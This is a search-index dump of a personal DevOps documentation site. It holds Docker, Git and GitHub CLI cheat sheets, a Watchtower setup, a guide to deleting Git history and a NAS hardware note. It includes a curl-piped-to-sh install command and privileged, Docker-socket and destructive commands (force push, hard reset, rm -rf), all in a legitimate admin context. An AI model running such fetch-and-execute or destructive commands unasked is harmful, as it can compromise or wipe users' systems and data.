", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#removing-containers", "title": "Removing Containers", "text": "docker rm <container_id>\n
force remove
docker rm -f <container_id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#find-container-ip-address", "title": "Find Container IP Address", "text": "docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container name/id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#copy-files-into-docker-container", "title": "Copy Files into Docker Container", "text": "docker cp <local file> <container name/id>:<remote file>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#copy-files-from-docker-container", "title": "Copy Files from Docker Container", "text": "docker cp <container name/id>:<remote file> <local file>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#purging", "title": "Purging", "text": "Purging All Unused or Dangling Images, Containers, Volumes, and Networks Docker provides a single command that will clean up any resources \u2014 images, containers, volumes, and networks \u2014 that are dangling (not associated with a container):
docker system prune\n
To additionally remove any stopped containers and all unused images (not just dangling images), add the -a flag to the command:
docker system prune -a\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#monitor-system-resource-utilization-for-running-containers", "title": "Monitor System Resource Utilization for Running Containers", "text": "To check the CPU, memory, and network I/O usage of a single container, you can use:
docker stats <container>\n
For all containers listed by ID:
docker stats $(docker ps -q)\n
For all containers listed by name:
docker stats $(docker ps --format '{{.Names}}')\n
For all containers listed by image:
docker ps -a -f ancestor=ubuntu\n
Remove all untagged images:
docker rmi $(docker images | grep \u201c^\u201d | awk '{split($0,a,\" \"); print a[3]}')\n
Remove container by a regular expression:
docker ps -a | grep wildfly | awk '{print $1}' | xargs docker rm -f\n
Remove all exited containers:
docker rm -f $(docker ps -a | grep Exit | awk '{ print $1 }')\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/", "title": "Docker Containers Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#whats-a-docker-container", "title": "What's a Docker Container?", "text": "A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#containers", "title": "Containers", "text": "Your basic isolated Docker process. Containers are to Virtual Machines as threads are to processes. Or you can think of them as chroots on steroids.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#lifecycle", "title": "Lifecycle", "text": " docker create
creates a container but does not start it. docker rename
allows the container to be renamed. docker run
creates and starts a container in one operation. docker rm
deletes a container. docker update
updates a container's resource limits. Normally if you run a container without options it will start and stop immediately, if you want keep it running you can use the command, docker run -td container_id
this will use the option -t
that will allocate a pseudo-TTY session and -d
that will detach automatically the container (run container in background and print container ID).
If you want a transient container, docker run --rm
will remove the container after it stops.
If you want to map a directory on the host to a docker container, docker run -v $HOSTDIR:$DOCKERDIR
. Also see Volumes.
If you want to remove also the volumes associated with the container, the deletion of the container must include the -v
switch like in docker rm -v
.
There's also a logging driver available for individual containers in docker 1.10. To run docker with a custom log driver (i.e., to syslog), use docker run --log-driver=syslog
.
Another useful option is docker run --name yourname docker_image
because when you specify the --name
inside the run command this will allow you to start and stop a container by calling it with the name the you specified when you created it.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#starting-and-stopping", "title": "Starting and Stopping", "text": " docker start
starts a container so it is running. docker stop
stops a running container. docker restart
stops and starts a container. docker pause
pauses a running container, \"freezing\" it in place. docker unpause
will unpause a running container. docker wait
blocks until running container stops. docker kill
sends a SIGKILL to a running container. docker attach
will connect to a running container. If you want to detach from a running container, use Ctrl + p, Ctrl + q
. If you want to integrate a container with a host process manager, start the daemon with -r=false
then use docker start -a
.
If you want to expose container ports through the host, see the exposing ports section.
Restart policies on crashed docker instances are covered here.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#cpu-constraints", "title": "CPU Constraints", "text": "You can limit CPU, either using a percentage of all CPUs, or by using specific cores.
For example, you can tell the cpu-shares
setting. The setting is a bit strange -- 1024 means 100% of the CPU, so if you want the container to take 50% of all CPU cores, you should specify 512. See https://goldmann.pl/blog/2014/09/11/resource-management-in-docker/#_cpu for more:
docker run -it -c 512 agileek/cpuset-test\n
You can also only use some CPU cores using cpuset-cpus
. See https://agileek.github.io/docker/2014/08/06/docker-cpuset/ for details and some nice videos:
docker run -it --cpuset-cpus=0,4,6 agileek/cpuset-test\n
Note that Docker can still see all of the CPUs inside the container -- it just isn't using all of them. See https://github.com/docker/docker/issues/20770 for more details.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#memory-constraints", "title": "Memory Constraints", "text": "You can also set memory constraints on Docker:
docker run -it -m 300M ubuntu:14.04 /bin/bash\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#capabilities", "title": "Capabilities", "text": "Linux capabilities can be set by using cap-add
and cap-drop
. See https://docs.docker.com/engine/reference/run/#/runtime-privilege-and-linux-capabilities for details. This should be used for greater security.
To mount a FUSE based filesystem, you need to combine both --cap-add and --device:
docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs\n
Give access to a single device:
docker run -it --device=/dev/ttyUSB0 debian bash\n
Give access to all devices:
docker run -it --privileged -v /dev/bus/usb:/dev/bus/usb debian bash\n
More info about privileged containers here.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#info", "title": "Info", "text": " docker ps
shows running containers. docker logs
gets logs from container. (You can use a custom log driver, but logs is only available for json-file
and journald
in 1.10). docker inspect
looks at all the info on a container (including IP address). docker events
gets events from container. docker port
shows public facing port of container. docker top
shows running processes in container. docker stats
shows containers' resource usage statistics. docker diff
shows changed files in the container's FS. docker ps -a
shows running and stopped containers.
docker stats --all
shows a list of all containers, default shows just running.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#import-export", "title": "Import / Export", "text": " docker cp
copies files or folders between a container and the local filesystem. docker export
turns container filesystem into tarball archive stream to STDOUT. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#executing-commands", "title": "Executing Commands", "text": " docker exec
to execute a command in container. To enter a running container, attach a new shell process to a running container called foo, use: docker exec -it foo /bin/bash
.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-containers/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/", "title": "Docker Images Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#whats-a-docker-image", "title": "What's a Docker Image?", "text": "A Docker image is a file used to execute code in a Docker container. Docker images act as a set of instructions to build a Docker container, like a template. Docker images also act as the starting point when using Docker. An image is comparable to a snapshot in virtual machine (VM) environments.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#images", "title": "Images", "text": "Images are just templates for docker containers.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#lifecycle", "title": "Lifecycle", "text": " docker images
shows all images. docker import
creates an image from a tarball. docker build
creates image from Dockerfile. docker commit
creates image from a container, pausing it temporarily if it is running. docker rmi
removes an image. docker load
loads an image from a tar archive as STDIN, including images and tags (as of 0.7). docker save
saves an image to a tar archive stream to STDOUT with all parent layers, tags & versions (as of 0.7). ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#info", "title": "Info", "text": " docker history
shows history of image. docker tag
tags an image to a name (local or registry). ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#cleaning-up", "title": "Cleaning up", "text": "While you can use the docker rmi
command to remove specific images, there's a tool called docker-gc that will safely clean up images that are no longer used by any containers. As of docker 1.13, docker image prune
is also available for removing unused images. See Prune.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#loadsave-image", "title": "Load/Save image", "text": "Load an image from file:
docker load < my_image.tar.gz\n
Save an existing image:
docker save my_image:my_tag | gzip > my_image.tar.gz\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#importexport-container", "title": "Import/Export container", "text": "Import a container as an image from file:
cat my_container.tar.gz | docker import - my_image:my_tag\n
Export an existing container:
docker export my_container | gzip > my_container.tar.gz\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#difference-between-loading-a-saved-image-and-importing-an-exported-container-as-an-image", "title": "Difference between loading a saved image and importing an exported container as an image", "text": "Loading an image using the load
command creates a new image including its history. Importing a container as an image using the import
command creates a new image excluding the history which results in a smaller image size compared to loading an image.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-images/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/", "title": "Docker Installation", "text": "You can download and install Docker on multiple platforms. The following are the most common ways to install Docker on Linux, Mac, and Windows. You can also install Docker on other platforms if you have the necessary software.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#images", "title": "Images", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#linux", "title": "Linux", "text": "Run this quick and easy install script provided by Docker:
curl -sSL https://get.docker.com/ | sh\n
If you're not willing to run a random shell script, please see the installation instructions for your distribution.
If you are a complete Docker newbie, you should follow the series of tutorials now.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#macos", "title": "macOS", "text": "Download and install Docker Community Edition. if you have Homebrew-Cask, just type brew install --cask docker
. Or Download and install Docker Toolbox. Docker For Mac is nice, but it's not quite as finished as the VirtualBox install. See the comparison.
NOTE Docker Toolbox is legacy. You should to use Docker Community Edition, See Docker Toolbox.
Once you've installed Docker Community Edition, click the docker icon in Launchpad. Then start up a container:
docker run hello-world\n
That's it, you have a running Docker container.
If you are a complete Docker newbie, you should probably follow the series of tutorials now.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#windows-10", "title": "Windows 10", "text": "Instructions to install Docker Desktop for Windows can be found here
Once installed, open powershell as administrator and run:
# Display the version of docker installed:\ndocker version\n\n# Pull, create, and run 'hello-world':\ndocker run hello-world\n
To continue with this cheat sheet, right click the Docker icon in the system tray, and go to settings. In order to mount volumes, the C:/ drive will need to be enabled in the settings to that information can be passed into the containers (later described in this article).
To switch between Windows containers and Linux containers, right click the icon in the system tray and click the button to switch container operating system Doing this will stop the current containers that are running, and make them unaccessible until the container OS is switched back.
Additionally, if you have WSL or WSL2 installed on your desktop, you might want to install the Linux Kernel for Windows. Instructions can be found here. This requires the Windows Subsystem for Linux feature. This will allow for containers to be accessed by WSL operating systems, as well as the efficiency gain from running WSL operating systems in docker. It is also preferred to use Windows terminal for this.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#windows-server-2016-2019", "title": "Windows Server 2016 / 2019", "text": "Follow Microsoft's instructions that can be found here
If using the latest edge version of 2019, be prepared to only work in powershell, as it is only a servercore image (no desktop interface). When starting this machine, it will login and go straight to a powershell window. It is reccomended to install text editors and other tools using Chocolatey.
After installing, these commands will work:
# Display the version of docker installed:\ndocker version\n\n# Pull, create, and run 'hello-world':\ndocker run hello-world\n
Windows Server 2016 is not able to run Linux images.
Windows Server Build 2004 is capable of running both linux and windows containers simultaneously through Hyper-V isolation. When running containers, use the --isolation=hyperv
command, which will isolate the container using a seperate kernel instance.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#check-version", "title": "Check Version", "text": "It is very important that you always know the current version of Docker you are currently running on at any point in time. This is very helpful because you get to know what features are compatible with what you have running. This is also important because you know what containers to run from the docker store when you are trying to get template containers. That said let see how to know which version of docker we have running currently.
docker version
shows which version of docker you have running. Get the server version:
$ docker version --format '{{.Server.Version}}'\n1.8.0\n
You can also dump raw JSON data:
$ docker version --format '{{json .}}'\n{\"Client\":{\"Version\":\"1.8.0\",\"ApiVersion\":\"1.20\",\"GitCommit\":\"f5bae0a\",\"GoVersion\":\"go1.4.2\",\"Os\":\"linux\",\"Arch\":\"am\"}\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-install/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/", "title": "Docker Networks & Links Cheat Sheet", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#networks", "title": "Networks", "text": "Docker has a networks feature. Docker automatically creates 3 network interfaces when you install it (bridge, host none). A new container is launched into the bridge network by default. To enable communication between multiple containers, you can create a new network and launch containers in it. This enables containers to communicate to each other while being isolated from containers that are not connected to the network. Furthermore, it allows to map container names to their IP addresses. See working with networks for more details.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#lifecycle", "title": "Lifecycle", "text": " docker network create
NAME Create a new network (default type: bridge). docker network rm
NAME Remove one or more networks by name or identifier. No containers can be connected to the network when deleting it. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#info", "title": "Info", "text": " docker network ls
List networks docker network inspect
NAME Display detailed information on one or more networks. ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#connection", "title": "Connection", "text": " docker network connect
NETWORK CONTAINER Connect a container to a network docker network disconnect
NETWORK CONTAINER Disconnect a container from a network You can specify a specific IP address for a container:
# create a new bridge network with your subnet and gateway for your ip block\ndocker network create --subnet 203.0.113.0/24 --gateway 203.0.113.254 iptastic\n\n# run a nginx container with a specific ip in that block\n$ docker run --rm -it --net iptastic --ip 203.0.113.2 nginx\n\n# curl the ip from any other place (assuming this is a public ip block duh)\n$ curl 203.0.113.2\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#links", "title": "Links", "text": "Links are how Docker containers talk to each other through TCP/IP ports. Atlassian show worked examples. You can also resolve links by hostname.
This has been deprecated to some extent by user-defined networks.
NOTE: If you want containers to ONLY communicate with each other through links, start the docker daemon with -icc=false
to disable inter process communication.
If you have a container with the name CONTAINER (specified by docker run --name CONTAINER
) and in the Dockerfile, it has an exposed port:
EXPOSE 1337\n
Then if we create another container called LINKED like so:
docker run -d --link CONTAINER:ALIAS --name LINKED user/wordpress\n
Then the exposed ports and aliases of CONTAINER will show up in LINKED with the following environment variables:
$ALIAS_PORT_1337_TCP_PORT\n$ALIAS_PORT_1337_TCP_ADDR\n
And you can connect to it that way.
To delete links, use docker rm --link
.
Generally, linking between docker services is a subset of \"service discovery\", a big problem if you're planning to use Docker at scale in production. Please read The Docker Ecosystem: Service Discovery and Distributed Configuration Stores for more info.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-networks/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/", "title": "Docker Security & Best Practices", "text": "", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security", "title": "Security", "text": "This is where security tips about Docker go. The Docker security page goes into more detail.
First things first: Docker runs as root. If you are in the docker
group, you effectively have root access. If you expose the docker unix socket to a container, you are giving the container root access to the host.
Docker should not be your only defense. You should secure and harden it.
For an understanding of what containers leave exposed, you should read Understanding and Hardening Linux Containers by Aaron Grattafiori. This is a complete and comprehensive guide to the issues involved with containers, with a plethora of links and footnotes leading on to yet more useful content. The security tips following are useful if you've already hardened containers in the past, but are not a substitute for understanding.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-tips", "title": "Security Tips", "text": "For greatest security, you want to run Docker inside a virtual machine. This is straight from the Docker Security Team Lead -- slides / notes. Then, run with AppArmor / seccomp / SELinux / grsec etc to limit the container permissions. See the Docker 1.10 security features for more details.
Docker image ids are sensitive information and should not be exposed to the outside world. Treat them like passwords.
See the Docker Security Cheat Sheet by Thomas Sj\u00f6gren: some good stuff about container hardening in there.
Check out the docker bench security script, download the white papers.
Snyk's 10 Docker Image Security Best Practices cheat sheet
You should start off by using a kernel with unstable patches for grsecurity / pax compiled in, such as Alpine Linux. If you are using grsecurity in production, you should spring for commercial support for the stable patches, same as you would do for RedHat. It's $200 a month, which is nothing to your devops budget.
Since docker 1.11 you can easily limit the number of active processes running inside a container to prevent fork bombs. This requires a linux kernel >= 4.3 with CGROUP_PIDS=y to be in the kernel configuration.
docker run --pids-limit=64\n
Also available since docker 1.11 is the ability to prevent processes from gaining new privileges. This feature have been in the linux kernel since version 3.5. You can read more about it in this blog post.
docker run --security-opt=no-new-privileges\n
From the Docker Security Cheat Sheet (it's in PDF which makes it hard to use, so copying below) by Container Solutions:
Turn off interprocess communication with:
docker -d --icc=false --iptables\n
Set the container to be read-only:
docker run --read-only\n
Verify images with a hashsum:
docker pull debian@sha256:a25306f3850e1bd44541976aa7b5fd0a29be\n
Set volumes to be read only:
docker run -v $(pwd)/secrets:/secrets:ro debian\n
Define and run a user in your Dockerfile so you don't run as root inside the container:
RUN groupadd -r user && useradd -r -g user user\nUSER user\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#user-namespaces", "title": "User Namespaces", "text": "There's also work on user namespaces -- it is in 1.10 but is not enabled by default.
To enable user namespaces (\"remap the userns\") in Ubuntu 15.10, follow the blog example.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-videos", "title": "Security Videos", "text": " Using Docker Safely Securing your applications using Docker Container security: Do containers actually contain? Linux Containers: Future or Fantasy? ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#security-roadmap", "title": "Security Roadmap", "text": "The Docker roadmap talks about seccomp support. There is an AppArmor policy generator called bane, and they're working on security profiles.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#best-practices", "title": "Best Practices", "text": "This is where general Docker best practices and war stories go:
The Rabbit Hole of Using Docker in Automated Tests Bridget Kromhout has a useful blog post on running Docker in production at Dramafever. There's also a best practices blog post from Lyst. Building a Development Environment With Docker Discourse in a Docker Container ", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/docker-security/#credit", "title": "Credit", "text": "Thanks to @wsargent for creating this cheat sheet.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/watchtower/", "title": "Watchtower", "text": "", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#quick-start", "title": "Quick Start", "text": "With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially. Run the watchtower container with the following command:
docker rundocker-compose.yml $ docker run -d \\\n--name watchtower \\\n-v /var/run/docker.sock:/var/run/docker.sock \\\ncontainrrr/watchtower\n
version: \"3\"\nservices:\nwatchtower:\nimage: containrrr/watchtower\nvolumes:\n- /var/run/docker.sock:/var/run/docker.sock\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#what-is-watchtower", "title": "What is Watchtower?", "text": "Watchtower is an application that will monitor your running Docker containers and watch for changes to the images that those containers were originally started from. If watchtower detects that an image has changed, it will automatically restart the container using the new image.
With watchtower you can update the running version of your containerized app simply by pushing a new image to the Docker Hub or your own image registry. Watchtower will pull down your new image, gracefully shut down your existing container and restart it with the same options that were used when it was deployed initially.
Full documanation can be found at Watchtower Documentation. Github repo can be found at Watchtower Github Repository.
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#run-ones", "title": "Run Ones", "text": "You can run Watchtower run once
to force an update of a containers by running the following command:
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock containrrr/watchtower --run-once\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/docker/watchtower/#docker-compose-example", "title": "Docker Compose Example", "text": "Blow is and example of a docker-compose.yml file that uses watchtower to automatically update your running containers at 3:30 AM every day, sending notifications to Telegram
with shoutrrr
version: '3'\n\nservices:\nwatchtower:\nimage: containrrr/watchtower\ncontainer_name: watchtower\nhostname: port-watchtower\nrestart: always\nnetwork_mode: bridge\nvolumes:\n- /var/run/docker.sock:/var/run/docker.sock\n- /etc/localtime:/etc/localtime\nenvironment:\n- WATCHTOWER_NOTIFICATIONS=shoutrrr\n- WATCHTOWER_NOTIFICATION_URL=telegram://<Bot-api-token>@telegram/?channels=<channel-id>\ncommand: --schedule '0 30 3 * * *' --cleanup\n
", "tags": ["docker", "container", "watchtower"]}, {"location": "devops/git/delete-commit-history/", "title": "Removing Sensitive Data from a Repository History", "text": "As humans, we sometimes make mistakes. One of them is committing sensitive data in our Git repository. If you commit sensitive data, such as a password, SSH key, API tokens, license keys and so on into a Git repository, you can remove it from the history. You can follow the official GitHub instructions to remove sensitive data from the history. It's probably the best and the right way to do it.
Below is a fast way to remove sensitive data from a repository's history but with a few caveats like loosing all the history of the repository.
", "tags": ["github", "history", "security"]}, {"location": "devops/git/delete-commit-history/#delete-commit-history-in-github-repository", "title": "Delete Commit History in Github Repository", "text": "Danger
This will remove your old commit history completely, You can\u2019t recover it again!
Create Orphan Branch \u2013 Create a new orphan branch in git repository. The newly created branch will not show in \u2018git branch\u2019 command.
git checkout --orphan temp_branch\n
Add Files to Branch \u2013 Now add all files to newly created branch and commit them using following commands.
git add -A\ngit commit -am \"first commit\"\n
Delete master/main Branch. Adjust the command according your git repository
git branch -D main\n
Rename Current Branch \u2013 After deleting the master/main branch, let\u2019s rename newly created branch name to master/main.
git branch -m main\n
Push Changes \u2013 You have completed the changes to your local git repository. Finally, push your changes to the remote master/main (Github) repository forcefully.
git push -f origin main\n
", "tags": ["github", "history", "security"]}, {"location": "devops/git/git-cli-cheat-sheet/", "title": "Git Cli Cheat Sheet", "text": "Git is a free and open source distributed version control system designed to quickly and efficiently manage everything from small to very large projects.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#create-repositories", "title": "Create Repositories", "text": "A new repository can either be created locally, or an existing repository can be cloned. When a repository was initialized locally, you have to push it to GitHub afterwards.
The git init command turns an existing directory into a new Git repository inside the folder you are running this command. After using the git init
command, link the local repository to an empty GitHub repository using the following command:
git init\n
Specifies the remote repository for your local repository. The url points to a repository on GitHub.
git remote add origin [url]\n
Clone (download) a repository that already exists on GitHub, including all of the files, branches, and commits
git clone [url]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#git-configuration", "title": "Git Configuration", "text": "Configure user information for all local repositories
Sets the name you want attached to your commit transactions
git config --global user.name \"[name]\"\n
Sets the email you want attached to your commit transactions
git config --global user.email \"[email address]\"\n
Enables helpful colorization of command line output
git config --global color.ui auto\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#synchronize-changes", "title": "Synchronize Changes", "text": "Synchronize your local repository with the remote repository on GitHub.com
Downloads all history from the remote tracking branches
git fetch\n
Combines remote tracking branches into current local branch
git merge\n
Uploads all local branch commits to GitHub
git push\n
Updates your current local working branch with all new commits from the corresponding remote branch on GitHub. git pull
is a combination of git fetch
and git merge
git pull\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#redo-commits", "title": "Redo Commits", "text": "Erase mistakes and craft replacement history
Undoes all commits after [commit], preserving changes locally
git reset [commit]\n
If you don't want to reset absolutely, but relatively that is also possible using
git reset HEAD~2\n
which undoes the last 2 commits. Discards all history and changes back to the specified commit
git reset --hard [commit]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#branches", "title": "Branches", "text": "Branches are an important part of working with Git. Any commits you make will be made on the branch you\u2019re currently \u201cchecked out\u201d to. Use git status to see which branch that is.
Creates a new branch
git branch [branch-name]\n
Switches to the specified branch and updates the working directory
git switch -c [branch-name]\n
or you can use
git checkout -b [branch-name]\n
to both create and switch to the branch simultaneously. Combines the specified branch\u2019s history into the current branch. This is usually done in pull requests, but is an important Git operation.
git merge [branch]\n
Deletes the specified branch
git branch -d [branch-name]\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#make-changes", "title": "Make Changes", "text": "Browse and inspect the evolution of project files
Lists version history for the current branch
git log\n
Lists version history for a file, beyond renames (works only for a single file)
git log --follow [file]\n
Shows content differences between two branches
git diff [first-branch]...[second-branch]\n
Outputs metadata and content changes of the specified commit
git show [commit]\n
Snapshots the file in preparation for versioning
git add [file]\n
Records file snapshots permanently in version history
git commit -m \"[descriptive message]\"\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#the-gitignore-file", "title": "The .gitignore file", "text": "Sometimes it may be a good idea to exclude files from being tracked with Git. This is typically done in a special file named .gitignore. You can find helpful templates for .gitignore
files at github.com/github/gitignore. If there are certain files (like .vscode
or .ide
) that should be discluded from all projects, you can create a global .gitignore
file to do so.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#untrack-files-already-added-to-git-repository-based-on-gitignore", "title": "Untrack Files Already Added to git Repository Based on .gitignore", "text": "Commit all your changes. Before proceeding, make sure all your changes are committed, including your .gitignore file. Remove everything from the repository. To clear your repo, use:
git rm -r --cached .\n
Re add everything.
git add .\n
Commit.
git commit -m \".gitignore fix\"\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-cli-cheat-sheet/#use-gist-as-repository", "title": "Use Gist as Repository", "text": "It's probably easiest if you just start by cloning the gist, so that origin
(a \"remote\" that refers to the original repository) is set up for you. Then you can just do git push origin master
. For example:
git clone git@gist.github.com:869085.git mygist\ncd mygist\n
Add you changes to the repository.
git add .\ngit commit -m \"Better comments\"\ngit push origin master\n
However, if you don't want to redo your changes, you can do:
cd mygist\ngit remote add origin git@gist.github.com:869085.git\ngit fetch origin\n# Push your changes, also setting the upstream for master:\ngit push -u origin master\n
Strictly speaking, the git fetch origin
and -u
argument to git push origin master
are optional, but they will helpfully associate the upstream branch master
in origin
with your local branch master
.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/git-submodules/", "title": "Git Submodules Cheat Sheet", "text": "", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#what-is-a-submodule", "title": "What is a Submodule?", "text": "Git submodules allow you to keep a git repository as a subdirectory of another git repository. Git submodules are simply a reference to another repository at a particular snapshot in time. Git submodules enable a Git repository to incorporate and track version history of external code.
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#add-a-submodule", "title": "Add a Submodule", "text": "You need to know the remote git repository url and where you want to place that it in your repository.
for example:
git submodule add https://github.com/fire1ce/3os.org path/to/submodule\ngit add .\ngit commit -m \"adds submodule path/to/submodule\"\n
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#cloning-a-project-with-submodules", "title": "Cloning A Project With Submodules", "text": "When you clone a repository that contains submodules there are a few extra steps to be taken.
for example:
git clone https://github.com/fire1ce/3os.org repo\ncd repo\ngit submodule init\ngit submodule update\n
If you\u2019re sure you want to fetch all submodules (and their submodules), you can also use this fancy one-liner:
git clone --recurse-submodules https://github.com/fire1ce/3os.org\n
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#submodule-update", "title": "Submodule Update", "text": "If you\u2019re simply tracking the master
or main
branch for the submodule, you can suffice with a simple fetch
and merge
.
cd path/to/submodule\ngit fetch\ngit merge origin/master\n
If you\u2019re in a hurry, you can streamline this for all submodules in your repo with:
git submodule update --remote --recursive\n
Commit this change to your own repo, so others are locked to this new version of the submodule as well.
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/git-submodules/#remove-a-submodule", "title": "Remove a submodule", "text": " Delete the relevant section from the .gitmodules
file. Stage the .gitmodules
changes git add .gitmodules
Delete the relevant section from .git/config
. Run git rm --cached path_to_submodule
(no trailing slash). Run rm -rf .git/modules/path_to_submodule
(no trailing slash). Commit git commit -m \"Removed submodule\"
Delete the now untracked submodule files rm -rf path_to_submodule
", "tags": ["github", "cheat-sheet", "submodules"]}, {"location": "devops/git/github-cli/", "title": "GitHub Cli Cheat Sheet", "text": "The GitHub Cli a is free and open source Cli tool to interact with GitHub repositories. It allows you to work solely from the command line, as well as navigate to remote (web) repositories very easily.
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/github-cli/#installation", "title": "Installation", "text": "The GitHub Cli can be found at https://cli.github.com/. The installation are very straightfoward, for example,
brew install gh\n
on macOS.", "tags": ["github", "git", "cheat-sheet"]}, {"location": "devops/git/github-cli/#some-example-commands", "title": "Some example commands", "text": "View the repository remotely.
gh repo view --web\n
Create a pull request remotely.
gh pr create --web\n
", "tags": ["github", "git", "cheat-sheet"]}, {"location": "homelab/devices/synology-nas/", "title": "Synology DS218+ NAS", "text": "One of then main devices in my HomeLab
is a Synology DS218+ NAS. It purpose mainly for backup and data synchronization tasks.
Synology DS218+ NAS was upgraded to 8GB of RAM. It has two SAMSUNG 870 QVO 4TB SSD, running in redundant mode. The 1GbE network was upgraded with SABRENT USB 5GbE Ethernet and the fan was replaced with Noctua NF-A9 FLX Fan for quieter operation.
Parts List
